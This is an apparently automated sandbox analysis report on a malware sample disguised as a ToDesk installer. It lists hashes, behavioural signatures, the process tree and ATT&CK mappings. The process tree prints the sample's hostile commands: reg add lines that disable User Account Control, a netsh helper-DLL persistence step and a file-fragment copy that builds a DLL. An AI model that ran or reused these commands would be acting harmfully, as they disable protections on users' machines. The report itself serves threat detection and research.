Analysis
max time kernel: 144s
max time network: 123s
platform: windows7_x64
resource: win7-20240903-en
resource tags: arch:x64 arch:x86 image:win7-20240903-en locale:en-us os:windows7-x64 system
submitted: 02-10-2024 01:22
Static task: static1
Behavioral task: behavioral1
Sample: ToDesk (2)_2.exe
Resource: win7-20240903-en
Behavioral task: behavioral2
Sample: ToDesk (2)_2.exe
Resource: win10v2004-20240802-en
General
Target: ToDesk (2)_2.exe
Size: 109.3MB
MD5: 496bcf85e4f82955c986a9969de65425
SHA1: a1d8c23621fdd405563d8cea6444c42da0315d38
SHA256: ba850dc72644dbd24c699b4f8f3c4856801af23c36e14d724e061b814cd0832a
SHA512: 3f599613b950dfc3396891e9320dc09b476d80bae065a84f88acb65b7cf702da96057e740c34afc6f91af3436ef80400501f0aab2d422cab90484a90d9cda915
SSDEEP: 3145728:rcGbmu6HFehEsw0Zfma2r9N8Qf0L8Brwm:Ilehdw0Zea2rThf1t
Malware Config
Signatures
UAC bypass 3 IoCs
description ioc Process
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" reg.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" reg.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe
ACProtect 1.3x - 1.4x DLL software 1 IoCs
Detects file using ACProtect software.
resource yara_rule
behavioral1/files/0x0006000000019c74-63.dat acprotect
Executes dropped EXE 4 IoCs
pid Process
2800 irsetup.exe
2036 ToDesk (2).exe
1896 MSI5B9D.tmp
1636 MFTVMornitor.exe
Loads dropped DLL 15 IoCs
pid Process
2144 ToDesk (2)_2.exe
2144 ToDesk (2)_2.exe
2144 ToDesk (2)_2.exe
2144 ToDesk (2)_2.exe
2800 irsetup.exe
2800 irsetup.exe
2036 ToDesk (2).exe
2036 ToDesk (2).exe
2036 ToDesk (2).exe
3000 MsiExec.exe
3000 MsiExec.exe
3000 MsiExec.exe
2964 msiexec.exe
1636 MFTVMornitor.exe
1636 MFTVMornitor.exe
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
UPX packed file 7 IoCs
resource yara_rule
behavioral1/files/0x0006000000019438-3.dat upx
behavioral1/memory/2144-6-0x0000000003370000-0x000000000373B000-memory.dmp upx
behavioral1/memory/2800-18-0x0000000000400000-0x00000000007CB000-memory.dmp upx
behavioral1/memory/2800-53-0x0000000000400000-0x00000000007CB000-memory.dmp upx
behavioral1/memory/2036-64-0x0000000074500000-0x00000000745BA000-memory.dmp upx
behavioral1/files/0x0006000000019c74-63.dat upx
behavioral1/memory/2036-128-0x0000000074500000-0x00000000745BA000-memory.dmp upx
Drops file in Program Files directory 6 IoCs
description ioc Process
File created C:\Program Files\SSD\SSD\cache_18_2 msiexec.exe
File created C:\Program Files\SSD\SSD\cache_18_3 msiexec.exe
File created C:\Program Files\SSD\SSD\cache_18_4 msiexec.exe
File created C:\Program Files\SSD\SSD\ddd.exe msiexec.exe
File created C:\Program Files\SSD\SSD\cache_18_0 msiexec.exe
File created C:\Program Files\SSD\SSD\cache_18_1 msiexec.exe
Drops file in Windows directory 14 IoCs
description ioc Process
File opened for modification C:\Windows\Installer\MSI5978.tmp msiexec.exe
File opened for modification C:\Windows\Installer\ msiexec.exe
File opened for modification C:\Windows\Installer\MSI5A82.tmp msiexec.exe
File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe
File opened for modification C:\Windows\Installer\f775792.msi msiexec.exe
File opened for modification C:\Windows\Installer\MSI581F.tmp msiexec.exe
File opened for modification C:\Windows\Installer\MSI58DB.tmp msiexec.exe
File opened for modification C:\Windows\INF\setupapi.ev1 DrvInst.exe
File created C:\Windows\Installer\f775792.msi msiexec.exe
File created C:\Windows\Installer\f775795.ipi msiexec.exe
File opened for modification C:\Windows\Installer\MSI5B9D.tmp msiexec.exe
File opened for modification C:\Windows\INF\setupapi.ev3 DrvInst.exe
File created C:\Windows\Installer\f775797.msi msiexec.exe
File opened for modification C:\Windows\Installer\f775795.ipi msiexec.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MFTVMornitor.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ToDesk (2)_2.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language irsetup.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ToDesk (2).exe
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process
2520 ipconfig.exe
Modifies data under HKEY_USERS 64 IoCs
Modifies registry class 23 IoCs
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process
2964 msiexec.exe
2964 msiexec.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process
2668 msiexec.exe
2668 msiexec.exe
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process
2800 irsetup.exe
2800 irsetup.exe
996 mmc.exe
996 mmc.exe
Suspicious use of WriteProcessMemory 56 IoCs
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
C:\Users\Admin\AppData\Local\Temp\ToDesk (2)_2.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\ToDesk (2)_2.exe"
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID: 2144
  C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe" __IRAOFF:1742194 "__IRAFN:C:\Users\Admin\AppData\Local\Temp\ToDesk (2)_2.exe" "__IRCT:0" "__IRTSS:0" "__IRSID:S-1-5-21-1846800975-3917212583-2893086201-1000"
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID: 2800
    C:\Windows\SysWOW64\msiexec.exe
      Command line: "C:\Windows\System32\msiexec.exe" /i "C:\SSD-w.msi"
      - Enumerates connected drives
      - System Location Discovery: System Language Discovery
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of FindShellTrayWindow
      PID: 2668
    C:\ToDesk (2).exe
      Command line: "C:\ToDesk (2).exe"
      - Executes dropped EXE
      - Loads dropped DLL
      - System Location Discovery: System Language Discovery
      PID: 2036
C:\Windows\system32\msiexec.exe
  Command line: C:\Windows\system32\msiexec.exe /V
  - Loads dropped DLL
  - Enumerates connected drives
  - Drops file in Program Files directory
  - Drops file in Windows directory
  - Modifies data under HKEY_USERS
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID: 2964
  C:\Windows\syswow64\MsiExec.exe
    Command line: C:\Windows\syswow64\MsiExec.exe -Embedding AD8166D956638EA1CEB27D47362417F4
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID: 3000
  C:\Windows\Installer\MSI5B9D.tmp
    Command line: "C:\Windows\Installer\MSI5B9D.tmp"
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of WriteProcessMemory
    PID: 1896
    C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c ipconfig /all
      - Suspicious use of WriteProcessMemory
      PID: 1348
      C:\Windows\system32\ipconfig.exe
        Command line: ipconfig /all
        - Gathers network information
        PID: 2520
    C:\Windows\System32\netsh.exe
      Command line: "C:\Windows\System32\netsh.exe" -f C:\Users\Public\Pictures\E830I.xml
      - Event Triggered Execution: Netsh Helper DLL
      - Modifies data under HKEY_USERS
      PID: 1940
    C:\Windows\System32\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Roaming\ZCDVv.bat"
      - Suspicious use of WriteProcessMemory
      PID: 2492
      C:\Windows\system32\reg.exe
        Command line: reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t reg_dword /d 0 /F
        - UAC bypass
        PID: 2032
      C:\Windows\system32\reg.exe
        Command line: reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t reg_dword /d 0 /F
        - UAC bypass
        PID: 2848
      C:\Windows\system32\reg.exe
        Command line: reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v PromptOnSecureDesktop /t reg_dword /d 0 /F
        - UAC bypass
        PID: 2628
    C:\Windows\System32\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" /c copy /b C:\Users\Public\Pictures\g68X1\f7pme~w\p+C:\Users\Public\Pictures\g68X1\f7pme~w\w C:\Users\Public\Pictures\g68X1\f7pme~w\libcurl.dll
      PID: 1816
C:\Windows\system32\vssvc.exe
  Command line: C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken
  PID: 2052
C:\Windows\system32\DrvInst.exe
  Command line: DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "00000000000003D4" "00000000000003CC"
  - Drops file in Windows directory
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID: 2084
C:\Windows\system32\mmc.exe
  Command line: C:\Windows\system32\mmc.exe -Embedding
  - Modifies data under HKEY_USERS
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID: 996
  C:\Users\Public\Pictures\g68X1\f7pme~w\MFTVMornitor.exe
    Command line: "C:\Users\Public\Pictures\g68X1\f7pme~w\MFTVMornitor.exe"
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID: 1636
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
- Abuse Elevation Control Mechanism (1): Bypass User Account Control (1)
- Event Triggered Execution (1): Netsh Helper DLL (1)
Defense Evasion
- Abuse Elevation Control Mechanism (1): Bypass User Account Control (1)
- Impair Defenses (1): Disable or Modify Tools (1)
- Modify Registry (1)
Downloads